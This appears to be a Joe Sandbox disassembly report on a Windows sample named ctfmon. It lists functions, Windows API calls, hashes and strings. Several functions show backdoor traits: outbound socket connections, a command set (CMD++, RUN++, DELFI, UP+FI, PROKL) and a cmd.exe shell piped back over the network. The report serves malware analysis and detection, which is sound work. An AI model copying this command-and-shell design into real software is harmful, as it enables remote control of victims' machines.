Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CommandLine
String ID:
API String ID: 3253501508-0
Opcode ID: d6fc8d5f54c61530a5c77b9057443d1d89c53e4bab3cd9aef80dc24be2ccb722
Instruction ID: 5f64aa0511f199e587e2562682c13d905a4b2d41f00720daa4a58be541493b64
Opcode Fuzzy Hash: d6fc8d5f54c61530a5c77b9057443d1d89c53e4bab3cd9aef80dc24be2ccb722
Instruction Fuzzy Hash: 8701A5B1904750ABC210EB65DC41F5B77A8EB85B24F404A2EF055632C1DB7C9405C7AA

Function 00422413 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,00000000,00000000,?,?,?,0042229C,00000000,?,00423318,?,?,?,00000000), ref: 00422440

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 81f7fa7795a58c9070dde423e946950128eaf9f2ba9c9b35d5eddbe908c3a4b3
Instruction ID: f2b3b73b2fa0f690a60d1bef5b73732d0ba4f5705fb81792612d96087fc2e6ef
Opcode Fuzzy Hash: 81f7fa7795a58c9070dde423e946950128eaf9f2ba9c9b35d5eddbe908c3a4b3
Instruction Fuzzy Hash: DBF0E230304A209FDB247B26F954B2B73F0AFA0319B81416FF00287230DAA4DC068A58

Function 004011C0 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(?,00000080), ref: 0040120A

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: IconLoad
String ID:
API String ID: 2457776203-0
Opcode ID: 783db8339120b3803db67abad11e484fa13dc9abfd5022a1b4a4c924fe9f323f
Instruction ID: e74f766c04b7c49422ceb5cf71cffa2e33917004825e20756c12fd70ddaf5a09
Opcode Fuzzy Hash: 783db8339120b3803db67abad11e484fa13dc9abfd5022a1b4a4c924fe9f323f
Instruction Fuzzy Hash: BCF05EB1644760AFD310EF59D941B1AB7E8FB44B60F408A1EF554D7780CBBD9404CBAA

Function 004241CF Relevance: 1.5, APIs: 1, Instructions: 17windowCOMMON

Download Yara Rule

APIs

IsDialogMessageW.USER32(?,?), ref: 004241F8

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: DialogMessage
String ID:
API String ID: 547518314-0
Opcode ID: 7f37717f5a0d1cad6fab656fae9d0e17bc25d5d1066a596d500859a9c5798ecc
Instruction ID: 40e96fc83cf72e62bc38d0dd10c762a652443d51e327850f1d3c9034ecc6bd13
Opcode Fuzzy Hash: 7f37717f5a0d1cad6fab656fae9d0e17bc25d5d1066a596d500859a9c5798ecc
Instruction Fuzzy Hash: 9BE08631204721AFC3119B14D40CA9A7BE5AF89300B0145A9F44982221C77598D2CB59

Function 00424B39 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

LoadStringW.USER32(?,?,?,?), ref: 00424B50

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 695f98c75e655a4ebf45e9277a1d54146fe03b87f83f651db76b8e19ecb3f902
Instruction ID: a506e4222beda04e1588787adb9b7428afadcb601b5091b2f91342631f0270ef
Opcode Fuzzy Hash: 695f98c75e655a4ebf45e9277a1d54146fe03b87f83f651db76b8e19ecb3f902
Instruction Fuzzy Hash: 92D0A976208362EBCB60DF60A848E4FBBE8FF943A0B014C0EF89083210C324E841CB65

Function 00423DA2 Relevance: 1.5, APIs: 1, Instructions: 14windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00423DBD

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 32e5277c3e9543733455b8c3b8d221857b9964b7cb34c309716bbb70ce16518a
Instruction ID: c85c3ea2753426f305096725929343eb9ef3bb4cd67ff242f83a7ca43b6db1df
Opcode Fuzzy Hash: 32e5277c3e9543733455b8c3b8d221857b9964b7cb34c309716bbb70ce16518a
Instruction Fuzzy Hash: D2D092F1620200AFA750DF28D944D363BE9EF18708760896AE848CA252E336DC23DB18

Function 00424368 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,?,00409949,00000000,?,?,?,?,00000000), ref: 00424376

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: ed463503181f5831d49e387adaee184ff8ba96adf0051b103f264377ab2b9ac7
Instruction ID: 5e28298704729bcf50cadef609a26d81d9e057ba8ea632b21b4816b74d65386d
Opcode Fuzzy Hash: ed463503181f5831d49e387adaee184ff8ba96adf0051b103f264377ab2b9ac7
Instruction Fuzzy Hash: A3D09230304210AFCB05CFA0DA48A1ABBA2FF94704BA085A9E4468A121D736DC53EB49

Function 0042147A Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 00421493

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: b47898489ddcb2b124179c95a74675b891bcc561428e8ec89230015038fb133d
Instruction ID: e93ab91fe77c0c32042803eb211a6ee4c214d71b7397e075563b18e63b4aab73
Opcode Fuzzy Hash: b47898489ddcb2b124179c95a74675b891bcc561428e8ec89230015038fb133d
Instruction Fuzzy Hash: 57D0A936004611AFC3216F18EC08ACBBFE0AF08310B01892EF48542431C7318C92DB88

Function 00401121 Relevance: 1.3, APIs: 1, Instructions: 20sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0001D4C0), ref: 0040113C

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c96f40a7069d522f032c98d5448b60f698f4b6c1c1402176db7ae5b90fe826fb
Instruction ID: aeaeee24bf346ca11c663ef522bbd7e48f8dbd3ce84c7fe3779714f86709666c
Opcode Fuzzy Hash: c96f40a7069d522f032c98d5448b60f698f4b6c1c1402176db7ae5b90fe826fb
Instruction Fuzzy Hash: C3B092765672209BD7249B449C426C43B989B0E704F410413DA01672A183F4248A5B9A

Function 00401130 Relevance: 1.3, APIs: 1, Instructions: 6sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0001D4C0), ref: 0040113C

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c013994515969efd125ce41308ae6106bc53f087768421e2f80ded30106a1cfd
Instruction ID: 8d0532a3e790895bab5c54fbd4c8d4022f4858262944ead44d32b07c1e7971d2
Opcode Fuzzy Hash: c013994515969efd125ce41308ae6106bc53f087768421e2f80ded30106a1cfd
Instruction Fuzzy Hash: E7B0127652723087C3009B449C016C43AD85B0E704F410013C601772E083F424C55F9B

Non-executed Functions

Function 00401FF0 Relevance: 90.1, APIs: 25, Strings: 26, Instructions: 805networksleepthreadCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(?,00000000,6F7B59B0,6F7CEE50), ref: 0040205E
send.WS2_32(00000000,?,?,00000000), ref: 00402498
CreateThread.KERNEL32(00000000,00000000,00404AD0,00000000,00000000,00000000), ref: 004024C8
closesocket.WS2_32(00000000), ref: 004024DE
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004025D2
TerminateProcess.KERNEL32(00000000,00000000), ref: 004025E4
CloseHandle.KERNEL32(00000000), ref: 004025EB
CreateThread.KERNEL32(00000000,00000000,00403DB0,00000000,00000000,00000000), ref: 0040261B
Sleep.KERNEL32(0000000A), ref: 0040263D
Sleep.KERNEL32(00000064), ref: 00402686
timeGetTime.WINMM(?,00000000,6F7B59B0,6F7CEE50), ref: 004021B8

Part of subcall function 00402F20: WaitForSingleObject.KERNEL32(00000348,000000FF,?,?,0053CB68,00403D13,?,00000049), ref: 00402F3E
Part of subcall function 00402F20: ResetEvent.KERNEL32(00000348,?,0053CB68,00403D13,?,00000049), ref: 00402F47
Part of subcall function 00402F20: SetEvent.KERNEL32(0000034C,?,0053CB68,00403D13,?,00000049), ref: 00402F77
Part of subcall function 00402F20: WaitForSingleObject.KERNEL32(0000034C,00000064,?,0053CB68,00403D13,?,00000049), ref: 00402F88
Part of subcall function 00402F20: Sleep.KERNEL32(0000000A,?,0053CB68,00403D13,?,00000049), ref: 00402F93
Part of subcall function 00402F20: SetEvent.KERNEL32(00000348,?,0053CB68,00403D13,?,00000049), ref: 00402F9E

WSAStartup.WS2_32(00000101,?), ref: 004022EB
htons.WS2_32(?), ref: 004022FB
inet_addr.WS2_32(?), ref: 00402312
inet_addr.WS2_32(?), ref: 0040231E
gethostbyname.WS2_32(?), ref: 0040232C
WSAGetLastError.WS2_32 ref: 00402338
socket.WS2_32(00000002,00000001,00000000), ref: 0040236E
connect.WS2_32(00000000,0053C7F0,00000010), ref: 0040239A
CreateThread.KERNEL32(00000000,00000000,004048D0,00000000,00000000,00000000), ref: 004023BB
Sleep.KERNEL32(000000C8), ref: 004023C6
send.WS2_32(00000000,?,?,00000000), ref: 00402409
closesocket.WS2_32(00000000), ref: 00402426

Strings

PROKL, xrefs: 004025B6
675052, xrefs: 004020F8, 0040217B, 00402252
CMD++, xrefs: 004025FB
I{}*A, xrefs: 0040257B
PTPM1, xrefs: 0040228C
I, xrefs: 00402558
CMD--, xrefs: 00402654
UP+FI, xrefs: 004029A6
FOAFI, xrefs: 00402705
DW-FI, xrefs: 004029C6
0D: 1H:24M, xrefs: 004020AA, 00402204
PTPM2, xrefs: 00402440
INIT+, xrefs: 00402121
LOGON, xrefs: 004021A7
exit, xrefs: 004026DD
OPEN, xrefs: 00402970
+*&=^^^^--------LOGON, xrefs: 004020D3, 00402155, 0040222D
DW-FS, xrefs: 004029E6
NO+++, xrefs: 00402025, 00402047
%3dD:%2dH:%2dM, xrefs: 004020A5, 004021FF
+*&=^^^^--------DRIVE, xrefs: 00402513
DRIVE, xrefs: 004024FB
RUN++, xrefs: 0040287D
DELFI, xrefs: 00402765
DW-ST, xrefs: 00402A85
PROCS, xrefs: 0040259A

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Sleep$CreateEventThread$ObjectProcessSingleTimeWaitclosesocketinet_addrsendtime$CloseErrorHandleLastOpenResetStartupTerminateconnectgethostbynamehtonssocket
String ID: 0D: 1H:24M$%3dD:%2dH:%2dM$+*&=^^^^--------DRIVE$+*&=^^^^--------LOGON$675052$CMD++$CMD--$DELFI$DRIVE$DW-FI$DW-FS$DW-ST$FOAFI$I$INIT+$I{}*A$LOGON$NO+++$OPEN$PROCS$PROKL$PTPM1$PTPM2$RUN++$UP+FI$exit
API String ID: 2946247661-3225441740
Opcode ID: 4c66f216693427eca67d31e7d5f5d8469bb6819db60560e656a88f52c5bef81a
Instruction ID: 30f2b201198bb2a24bcc67c28f232b873d1066fbd5e9a9fc7583fe69ebf5afeb
Opcode Fuzzy Hash: 4c66f216693427eca67d31e7d5f5d8469bb6819db60560e656a88f52c5bef81a
Instruction Fuzzy Hash: BD5225326043049FDB24CF24D84476B7BA6BBD5300F45853EE94AAB3C1DFB99D0A8B59

Function 0041D720 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 298COMMON

Download Yara Rule

APIs

GetPropA.USER32(?,?), ref: 0041D765
CallWindowProcA.USER32(00000000), ref: 0041D787

Part of subcall function 0041C470: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 0041C496
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4AE
Part of subcall function 0041C470: RemovePropA.USER32(?,?), ref: 0041C4BA

Strings

#32770, xrefs: 0041D936

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID: #32770
API String ID: 2276450057-463685578
Opcode ID: 659aa437e6f9b1db763d0980aaa66f1d77c78cae941e8152d1942417593f74f3
Instruction ID: 94ad4723163bdf2d308ea6e45922d28c75bada5694cf6dcea4a57aff3eeba185
Opcode Fuzzy Hash: 659aa437e6f9b1db763d0980aaa66f1d77c78cae941e8152d1942417593f74f3
Instruction Fuzzy Hash: B4811976B0530477D620BB55EC84FEF776CEF853A5F400427FA0182292D729A985C7BA

Function 00404AD0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 268networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00404B01
htons.WS2_32(00000000), ref: 00404B33
htons.WS2_32(00000000), ref: 00404B3B
socket.WS2_32(00000002,00000001,00000000), ref: 00404B59

Strings

+*&=^^^^--------PTPM2, xrefs: 00404CE8, 00404D7E, 00404E1B

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: htons$Startupsocket
String ID: +*&=^^^^--------PTPM2
API String ID: 4109548558-2390715153
Opcode ID: e7629c067e5fdbe14b2d9f1b6ed21f636c11199621b624a142a10588866ee9f3
Instruction ID: 346ed77a3f42d4ca601688a76fa85a796bd0d35956720dbea263a7c1e4379ff6
Opcode Fuzzy Hash: e7629c067e5fdbe14b2d9f1b6ed21f636c11199621b624a142a10588866ee9f3
Instruction Fuzzy Hash: 349106715092449FD730CF24AC84AABBBF8EBD4310F44853FE54493390D779A94E9BA6

Function 00417032 Relevance: 26.7, Strings: 21, Instructions: 417COMMON

Download Yara Rule

Strings

9, xrefs: 00417147
c, xrefs: 00417121
0, xrefs: 0041710E
0, xrefs: 004171D3
+, xrefs: 00417227
1, xrefs: 004172AA
0, xrefs: 0041715C
-, xrefs: 00417109
9, xrefs: 004170F3
9, xrefs: 004170A1
9, xrefs: 0041727F
C, xrefs: 00417113
+, xrefs: 00417104
-, xrefs: 00417230
0, xrefs: 004172D1
9, xrefs: 004172B3
E, xrefs: 0041711C
9, xrefs: 004172C3
1, xrefs: 00417277
0, xrefs: 004172A0
e, xrefs: 0041712A

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID:
String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$c$e
API String ID: 0-1157002505
Opcode ID: b9510dcf841a2d8b4d4510080941060aba2e18d74fd39af2c763ac35744268c8
Instruction ID: 72ba9979bd33a82a7dc4d693d9c97e677760f1d98e671c18ae2a61919c5ed11a
Opcode Fuzzy Hash: b9510dcf841a2d8b4d4510080941060aba2e18d74fd39af2c763ac35744268c8
Instruction Fuzzy Hash: D2E1F131D9C209DEEB258F64C8457FE7BB1BB04304F68406BE851A6382D77C8AC2DB59

Function 00403DB0 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 284pipesleepfileCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403DEF
CreatePipe.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403E01
CreateProcessW.KERNEL32 ref: 00403E8E
Sleep.KERNEL32(000003E8), ref: 00403E99
Sleep.KERNEL32(000000C8), ref: 00403EE1
PeekNamedPipe.KERNEL32(?,00000000,00001000,?,00000000,00000000), ref: 00403EF8
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00403F1B
WriteFile.KERNEL32(?,exit,00000006,?,00000000), ref: 004040F5

Strings

exit, xrefs: 004040EF
cmd.exe, xrefs: 00403E0E
exit, xrefs: 004040A9
+*&=^^^^--------CMD--, xrefs: 00403F8D

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CreatePipe$FileSleep$NamedPeekProcessReadWrite
String ID: +*&=^^^^--------CMD--$cmd.exe$exit$exit
API String ID: 4180828904-1671145255
Opcode ID: 97d2dc80daee14cd8b07cf939912a4cb6b383654e3bb96b0cd9faa687eacef6c
Instruction ID: b70c06b44eefa63bc239fc03f3aab28687b9ac6a1c24dff492d9dcfd48d6b085
Opcode Fuzzy Hash: 97d2dc80daee14cd8b07cf939912a4cb6b383654e3bb96b0cd9faa687eacef6c
Instruction Fuzzy Hash: 8AA18EB26043099FD714CF64D840BABBBE9BB88700F40493EF649E7380DA75AD068B56

Function 00403A00 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 202processCOMMON

Download Yara Rule

APIs

EnumProcesses.PSAPI(?,00001000,?,PROCS,?,004025AC), ref: 00403A3E
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00001000,?,PROCS,?,004025AC), ref: 00403A5B

Strings

+*&=^^^^--------PROCS, xrefs: 00403AA6
PROCS, xrefs: 00403A11

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CreateEnumProcessesSnapshotToolhelp32
String ID: +*&=^^^^--------PROCS$PROCS
API String ID: 3846999141-2662039986
Opcode ID: ec872aaca7dab5de4dc8b0dbbf1885990af5137ecd8fa4750e36b93221478237
Instruction ID: 624bcb37762edd4edd6f55eff34c223af5f14a6d3ea4ea25fcc202f1aac3f0d4
Opcode Fuzzy Hash: ec872aaca7dab5de4dc8b0dbbf1885990af5137ecd8fa4750e36b93221478237
Instruction Fuzzy Hash: 1361F3726043065BD720DF64DC81AAF77E9EFD8304F40093EF94597281EA79EA09C76A

Function 0041CF70 Relevance: 19.7, APIs: 13, Instructions: 220windowCOMMON

Download Yara Rule

APIs

CallWindowProcA.USER32(00000000,00000000,?,?,?), ref: 0041CFAA
DefWindowProcA.USER32(00000000,?,?,?), ref: 0041CFBD
IsIconic.USER32(00000000), ref: 0041CFDF
SendMessageA.USER32(00000000,000011EF,00000000,00000001), ref: 0041D00C
GetWindowLongA.USER32(00000000,000000F0), ref: 0041D01B
GetWindowDC.USER32(00000000), ref: 0041D05C
GetWindowRect.USER32(00000000,?), ref: 0041D06A
InflateRect.USER32(?,000000FF,000000FF), ref: 0041D0AD
InflateRect.USER32(?,000000FF,000000FF), ref: 0041D0D0
